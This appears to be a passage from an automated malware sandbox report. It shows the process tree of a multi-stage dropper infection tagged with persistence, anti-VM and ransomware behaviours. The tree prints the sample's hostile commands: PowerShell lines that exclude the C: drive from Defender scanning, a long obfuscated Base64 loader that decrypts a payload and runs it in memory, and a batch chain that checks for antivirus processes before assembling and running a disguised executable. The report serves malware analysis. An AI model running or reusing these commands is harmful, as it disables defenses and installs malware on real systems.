PID 3180 wrote to memory of 992	3180	futors.exe	113
PID 3180 wrote to memory of 992	3180	futors.exe	113
PID 3180 wrote to memory of 992	3180	futors.exe	113
PID 3560 wrote to memory of 2256	3560	svchost.exe	114
PID 3560 wrote to memory of 2256	3560	svchost.exe	114
PID 3560 wrote to memory of 4684	3560	svchost.exe	115
PID 3560 wrote to memory of 4684	3560	svchost.exe	115
PID 3748 wrote to memory of 4788	3748	rapes.exe	116
PID 3748 wrote to memory of 4788	3748	rapes.exe	116
PID 3748 wrote to memory of 4788	3748	rapes.exe	116
PID 992 wrote to memory of 4140	992	7195620bae.exe	118
PID 992 wrote to memory of 4140	992	7195620bae.exe	118
PID 992 wrote to memory of 4140	992	7195620bae.exe	118
PID 992 wrote to memory of 4140	992	7195620bae.exe	118
PID 992 wrote to memory of 4140	992	7195620bae.exe	118
PID 992 wrote to memory of 4140	992	7195620bae.exe	118
PID 992 wrote to memory of 4140	992	7195620bae.exe	118
PID 992 wrote to memory of 4140	992	7195620bae.exe	118
PID 992 wrote to memory of 4140	992	7195620bae.exe	118
PID 3748 wrote to memory of 6220	3748	rapes.exe	120
PID 3748 wrote to memory of 6220	3748	rapes.exe	120
PID 3748 wrote to memory of 10568	3748	rapes.exe	123
PID 3748 wrote to memory of 10568	3748	rapes.exe	123
PID 3748 wrote to memory of 10568	3748	rapes.exe	123
PID 10568 wrote to memory of 12880	10568	cmd.exe	126
PID 10568 wrote to memory of 12880	10568	cmd.exe	126
PID 10568 wrote to memory of 12880	10568	cmd.exe	126
PID 12880 wrote to memory of 13088	12880	cmd.exe	128
PID 12880 wrote to memory of 13088	12880	cmd.exe	128
PID 12880 wrote to memory of 13088	12880	cmd.exe	128
PID 3748 wrote to memory of 11796	3748	rapes.exe	130
PID 3748 wrote to memory of 11796	3748	rapes.exe	130
PID 11796 wrote to memory of 5956	11796	n0hEgR9.exe	131
PID 11796 wrote to memory of 5956	11796	n0hEgR9.exe	131
PID 11796 wrote to memory of 5956	11796	n0hEgR9.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3116
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4856

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3680
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3748
- - C:\Users\Admin\AppData\Local\Temp\10474940101\VrQSuEQ.exe
    "C:\Users\Admin\AppData\Local\Temp\10474940101\VrQSuEQ.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:960
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3240
- - C:\Users\Admin\AppData\Local\Temp\10474950101\amnew.exe
    "C:\Users\Admin\AppData\Local\Temp\10474950101\amnew.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
      4⤵
      Downloads MZ/PE file
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3180
    - - C:\Users\Admin\AppData\Local\Temp\10053080101\7195620bae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053080101\7195620bae.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:992
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053080101\7195620bae.exe"
        6⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4140
- - C:\Users\Admin\AppData\Local\Temp\10474960101\UZPt0hR.exe
    "C:\Users\Admin\AppData\Local\Temp\10474960101\UZPt0hR.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2248
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:3560
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Executes dropped EXE
        
        PID:2256
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:4684
      - C:\Users\Admin\AppData\Local\Temp\{051215af-b17f-42e9-ba50-98949af90edf}\2ca55af8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{051215af-b17f-42e9-ba50-98949af90edf}\2ca55af8.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        6⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:6056
        
        C:\Users\Admin\AppData\Local\Temp\{096ac7c4-3131-4f08-9ccb-1c49afb70738}\a61daa52.exe
        
        C:/Users/Admin/AppData/Local/Temp/{096ac7c4-3131-4f08-9ccb-1c49afb70738}/\a61daa52.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        7⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:12800
- - C:\Users\Admin\AppData\Local\Temp\10474970101\8358f51d9a.exe
    "C:\Users\Admin\AppData\Local\Temp\10474970101\8358f51d9a.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4788
- - C:\Users\Admin\AppData\Local\Temp\10474980101\RYZusWg.exe
    "C:\Users\Admin\AppData\Local\Temp\10474980101\RYZusWg.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:6220
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10474991121\ccosvAs.cmd"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:10568
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10474991121\ccosvAs.cmd"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:12880
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:13088
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5316
- - C:\Users\Admin\AppData\Local\Temp\10475000101\n0hEgR9.exe
    "C:\Users\Admin\AppData\Local\Temp\10475000101\n0hEgR9.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:11796
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5956
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:6464
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:6404
- - C:\Users\Admin\AppData\Local\Temp\10475010101\Rm3cVPI.exe
    "C:\Users\Admin\AppData\Local\Temp\10475010101\Rm3cVPI.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5440
- - C:\Users\Admin\AppData\Local\Temp\10475020101\mTk60rz.exe
    "C:\Users\Admin\AppData\Local\Temp\10475020101\mTk60rz.exe"
    3⤵
    - Executes dropped EXE
    PID:7784
  - - C:\Users\Admin\AppData\Local\Temp\onefile_7784_133884024842525953\ZSoeRVBe.exe
      C:\Users\Admin\AppData\Local\Temp\10475020101\mTk60rz.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:9896
- - C:\Users\Admin\AppData\Local\Temp\10475030101\d00a5fce0a.exe
    "C:\Users\Admin\AppData\Local\Temp\10475030101\d00a5fce0a.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:9748
- - C:\Users\Admin\AppData\Local\Temp\10475040101\LJl8AAr.exe
    "C:\Users\Admin\AppData\Local\Temp\10475040101\LJl8AAr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2584
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:6724
- - C:\Users\Admin\AppData\Local\Temp\10475050101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10475050101\TbV75ZR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:9916
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:7844
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7844 -s 512
        5⤵
        Program crash
        
        PID:2748
- - C:\Users\Admin\AppData\Local\Temp\10475060101\larBxd7.exe
    "C:\Users\Admin\AppData\Local\Temp\10475060101\larBxd7.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:11576
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:11124
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6544
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3044
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:10320
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:10592
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6996
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6756
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        5⤵
        
        PID:8460
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        5⤵
        
        PID:1636
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        5⤵
        
        PID:8808
    - - C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        5⤵
        
        PID:9580
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:9896
- - C:\Users\Admin\AppData\Local\Temp\10475070101\9sWdA2p.exe
    "C:\Users\Admin\AppData\Local\Temp\10475070101\9sWdA2p.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:12520
- - C:\Users\Admin\AppData\Local\Temp\10475080101\qhjMWht.exe
    "C:\Users\Admin\AppData\Local\Temp\10475080101\qhjMWht.exe"
    3⤵
    PID:4792
- - C:\Users\Admin\AppData\Local\Temp\10475090101\YMauSAr.exe
    "C:\Users\Admin\AppData\Local\Temp\10475090101\YMauSAr.exe"
    3⤵
    PID:12956
  - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
      4⤵
      PID:11088
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        5⤵
        
        PID:11876
      - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        6⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        7⤵
        
        PID:11964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        8⤵
        
        PID:11600
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        9⤵
        
        PID:12632
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        10⤵
        
        PID:7964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        11⤵
        
        PID:5964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        12⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        13⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        14⤵
        
